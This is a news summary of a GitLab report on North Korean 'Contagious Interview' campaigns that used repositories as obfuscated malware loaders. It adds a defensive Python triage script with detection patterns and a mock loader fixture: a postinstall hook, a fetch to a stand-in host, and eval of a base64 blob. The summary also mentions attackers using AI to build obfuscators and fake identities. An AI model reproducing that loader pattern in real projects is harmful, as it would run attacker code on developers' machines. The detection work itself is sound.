A technical analysis by GitLab found that North Korean threat actors used GitLab projects as obfuscated loaders for malware, and that 131 North Korean-attributed accounts were banned last year.
KEY FACTS
- Accounts banned: 131 North Korean-attributed GitLab accounts removed last year
- Primary method: projects used as obfuscated loaders for payloads such as BeaverTail and Ottercookie
- Campaign: Contagious Interview scams lure developers with fake technical interviews
- Cell revenue: one eight-person cell reported $1.64 million from Q1 2022 to Q3 2025
Activity began as early as 2019 and accelerated in 2022. The platform removed suspect repositories as part of disruption efforts during the most recent year.
Projects frequently served as obfuscated loaders that retrieved malware hosted off-platform. The tradecraft evolved to include malicious NPM dependencies, sandbox detection, and invite-only private projects.
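As an added illustration of the loader pattern just described (not code from GitLab's report), the script below triages a cloned "take-home interview" repository for the traits a defender would check before running it: install-time npm lifecycle hooks, dynamic evaluation of decoded text, hard-coded remote fetches, and long encoded blobs. The heuristics and the sample repository are constructed assumptions, not the report's indicators.

```python
"""Heuristic triage of a cloned repository before `npm install` or `node`.

The regexes below are illustrative assumptions, not indicators from the
GitLab report. They flag the traits of an obfuscated loader that pulls its
real payload from off-platform hosting.
"""
import json
import re

LIFECYCLE_HOOKS = {"preinstall", "install", "postinstall", "prepare"}
DYNAMIC_EXEC = re.compile(r"\b(eval|new Function|child_process|execSync)\b")
REMOTE_URL = re.compile(r"https?://[^\s'\"`]+")
# 120+ base64 characters or 40+ \xNN escapes: a packed second stage
ENCODED_BLOB = re.compile(r"[A-Za-z0-9+/]{120,}={0,2}|(?:\\x[0-9a-fA-F]{2}){40,}")


def scan_manifest(text):
    """Findings for package.json: hooks that run on install, odd dependency sources."""
    pkg = json.loads(text)
    out = []
    for hook, cmd in pkg.get("scripts", {}).items():
        if hook in LIFECYCLE_HOOKS:
            out.append(f"package.json: '{hook}' hook runs `{cmd}` during npm install")
    for dep, spec in pkg.get("dependencies", {}).items():
        if REMOTE_URL.search(spec) or spec.startswith(("git+", "file:")):
            out.append(f"package.json: dependency {dep} resolved from {spec}")
    return out


def scan_source(path, text):
    """Findings for loader-style traits in one JavaScript/TypeScript file."""
    out = []
    m = DYNAMIC_EXEC.search(text)
    if m:
        out.append(f"{path}: dynamic code execution via {m.group(0)}")
    for url in REMOTE_URL.findall(text):
        out.append(f"{path}: hard-coded remote fetch {url}")
    if ENCODED_BLOB.search(text):
        out.append(f"{path}: long encoded blob (possible packed stage)")
    return out


def triage_repo(files):
    """files maps relative path -> content; returns every finding as a string."""
    findings = []
    for path, text in files.items():
        if path.endswith("package.json"):
            findings += scan_manifest(text)
        elif path.endswith((".js", ".mjs", ".cjs", ".ts")):
            findings += scan_source(path, text)
    return findings


# Constructed sample repository (not a real project): one benign module, one loader
SAMPLE_REPO = {
    "package.json": json.dumps({"name": "demo", "dependencies": {"lodash": "^4.17.21"},
                                "scripts": {"postinstall": "node setup.js", "test": "jest"}}),
    "setup.js": "const p='" + "QUJD" * 40 + "';\nfetch('https://example.invalid/stage2');\n"
                "eval(Buffer.from(p,'base64').toString());",
    "src/app.js": "module.exports = (a, b) => a + b;",
}
```

Run `triage_repo` on a freshly cloned tree and review each finding by hand; an empty result is not a clean bill of health, only the absence of these four traits.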
Actors adopted AI to produce custom obfuscators and to automate large numbers of synthetic identities. One operator assembled 21 personas by pairing images with stolen scans of US identity documents. Some repositories contained personnel dossiers, passport scans and bank records.
One likely Beijing-based cell of eight members recorded $1.64 million in revenue between Q1 2022 and Q3 2025 and had earnings above $11,000 per member in Q3 2025. Operators commonly used consumer VPNs and sometimes routed access through VPS infrastructure or laptop farms. Targets included US-based developers, fintech firms, contractors on freelancing platforms and smaller organizations hiring remote developers.
WHY IT MATTERS
Weaponizing trust in recruitment lets attackers bypass perimeter controls by convincing developers to run malicious code. The report includes detailed indicators of compromise intended to help defenders strengthen detection and response.